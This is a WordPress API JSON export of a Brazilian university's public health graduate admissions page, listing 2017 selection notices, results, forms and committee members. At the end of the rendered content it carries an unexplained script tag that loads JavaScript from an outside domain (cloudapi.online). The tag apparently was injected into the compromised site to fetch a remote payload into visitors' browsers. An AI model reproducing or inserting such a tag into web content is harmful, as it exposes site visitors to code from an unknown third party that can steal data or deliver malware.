
{"id":134,"date":"2016-09-16T19:29:19","date_gmt":"2016-09-16T19:29:19","guid":{"rendered":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/?page_id=134"},"modified":"2017-07-04T19:23:35","modified_gmt":"2017-07-04T19:23:35","slug":"processo-seletivo-2017","status":"publish","type":"page","link":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/processo-seletivo-2017\/","title":{"rendered":"Processo Seletivo 2017"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Resultado-Final-Doutorado-2017-2-04-07-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Resultado Final &#8211; Doutorado 2017\/2<br \/>\n<\/a><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Resultado-Final-Pos-doutorado-2017-2-04-07-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Resultado Final &#8211; P\u00f3s-doutorado 2017\/2<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Resultado-1-Etapa-DOUTORADO-2017-2-26-06-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Resultado 1\u00aa Etapa &#8211; Doutorado 2017\/2<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Escala-Arqui\u00e7\u00e3o-Oral-DOUTORADO-2017-2-26-06-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Escala de Argui\u00e7\u00e3o &#8211; Doutorado 2017\/2<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Declara\u00e7\u00f5es-Inexist\u00eancia-de-Impedimento-e-Suspei\u00e7\u00e3o-2017-2-22-06-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Declara\u00e7\u00f5es Inexist\u00eancia de Impedimento e Suspei\u00e7\u00e3o 2017-2<\/a><\/p>\n<p><strong>Comiss\u00e3o de Sele\u00e7\u00e3o \u2013 Doutorado 2017\/2<br \/>\n<\/strong>Profa. Luana Giatti Gon\u00e7alves<br \/>\nProfa. Lidyane do Valle Camelo<br \/>\nProfa. Efig\u00eania Ferreira e Ferreira<\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/deferimento20062017.pdf\">Deferimento dos Pedidos de Inscri\u00e7\u00f5es\u00a0&#8211; Doutorado 2017\/2<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/EDITAL-N\u00ba-001-29-05-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Edital de Sele\u00e7\u00e3o P\u00f3s-doutorado<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Edital-Doutorado_2017_2_final-1.pdf\">Edital de Sele\u00e7\u00e3o 2017\/2 \u2013 Doutorado Fluxo Cont\u00ednuo<\/a><\/p>\n<p><a href=\"http:\/\/ftp.medicina.ufmg.br\/cpg\/arquivos\/2017\/Formulario_de_inscricao-Saude_Publica_2017_2.xls\">Formul\u00e1rio de Inscri\u00e7\u00e3o Doutorado 2017\/2<\/a><\/p>\n<hr \/>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/wp-content\/uploads\/sites\/7\/2016\/12\/Resultado_doutorado.pdf\">Resultado Final &#8211; Doutorado<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/SaudePublica.pdf\">Resultado Final &#8211; Mestrado \/ Sa\u00fade P\u00fablica<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Epidemiologia-2017-1.pdf\">Resultado Final &#8211; Mestrado \/ Epidemiologia<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/resultado28112016.pdf\">Resultado 1\u00aa Etapa &#8211; Doutorado<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/escala28112016.pdf\">Escala de Argui\u00e7\u00e3o &#8211; Doutorado<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Declaracoes.pdf\">Declara\u00e7\u00e3o de inexist\u00eancia de impedimento e suspei\u00e7\u00e3o dos membros da banca examinadora de Doutorado.<\/a><\/p>\n<p>Comiss\u00e3o de Sele\u00e7\u00e3o \u2013 Doutorado 2017\/1<\/p>\n<p>Profa. Ana Paula Souto Melo<br \/>\nProfa. Ilka Afonso Reis<br \/>\nProf. Roberto Marini Ladeira<\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Declara\u00e7\u00f5es.pdf\">Declara\u00e7\u00e3o de inexist\u00eancia de impedimento e suspei\u00e7\u00e3o dos membros da banca examinadora de Mestrado<b><\/b><\/a><\/p>\n<div class=\"gmail_default\">Comiss\u00e3o de Sele\u00e7\u00e3o \u2013 Mestrado 2017\/1<\/div>\n<div class=\"gmail_default\"><\/div>\n<div class=\"gmail_default\">Profa. Luana Giatti Gon\u00e7alves<\/div>\n<div class=\"gmail_default\">Profa. Mari\u00e2ngela Leal Cherchiglia<\/div>\n<div class=\"gmail_default\">Profa. Gisele Macedo da Silva Bonfante<\/div>\n<div class=\"gmail_default\"><\/div>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/deferimento08112016.pdf\">Deferimento dos Pedidos de Inscri\u00e7\u00f5es<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/instrucoes08112016.pdf\">Instru\u00e7\u00f5es para realiza\u00e7\u00e3o da Prova de Mestrado<\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Edital-Doutorado_2017.pdf\"><b>Edital de Sele\u00e7\u00e3o 2017 &#8211; Doutorado<\/b><\/a><\/p>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-content\/uploads\/sites\/43\/2016\/09\/Edital-Mestrado_2017.pdf\"><b>Edital de Sele\u00e7\u00e3o 2017 &#8211;\u00a0Mestrado<\/b><\/a><\/p>\n<p><a href=\"http:\/\/ftp.medicina.ufmg.br\/cpg\/arquivos\/2016\/formulario_de_inscricao-saude_publica_2017_16-09-2016.xls\"><b>Formul\u00e1rio de Inscri\u00e7\u00e3o<\/b><\/a><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Resultado Final &#8211; Doutorado 2017\/2 Resultado Final &#8211; P\u00f3s-doutorado 2017\/2 Resultado 1\u00aa Etapa &#8211; Doutorado 2017\/2 Escala de Argui\u00e7\u00e3o &#8211; Doutorado 2017\/2 Declara\u00e7\u00f5es Inexist\u00eancia de Impedimento e Suspei\u00e7\u00e3o 2017-2 Comiss\u00e3o de Sele\u00e7\u00e3o \u2013 Doutorado 2017\/2 Profa. Luana Giatti Gon\u00e7alves Profa. Lidyane do Valle Camelo Profa. Efig\u00eania Ferreira e Ferreira Deferimento dos Pedidos de Inscri\u00e7\u00f5es\u00a0&#8211; [&hellip;]<\/p>\n","protected":false},"author":17,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-134","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/pages\/134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/users\/17"}],"replies":[{"embeddable":true,"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/comments?post=134"}],"version-history":[{"count":31,"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/pages\/134\/revisions"}],"predecessor-version":[{"id":550,"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/pages\/134\/revisions\/550"}],"wp:attachment":[{"href":"https:\/\/www.medicina.ufmg.br\/cpgsaudepublica\/wp-json\/wp\/v2\/media?parent=134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}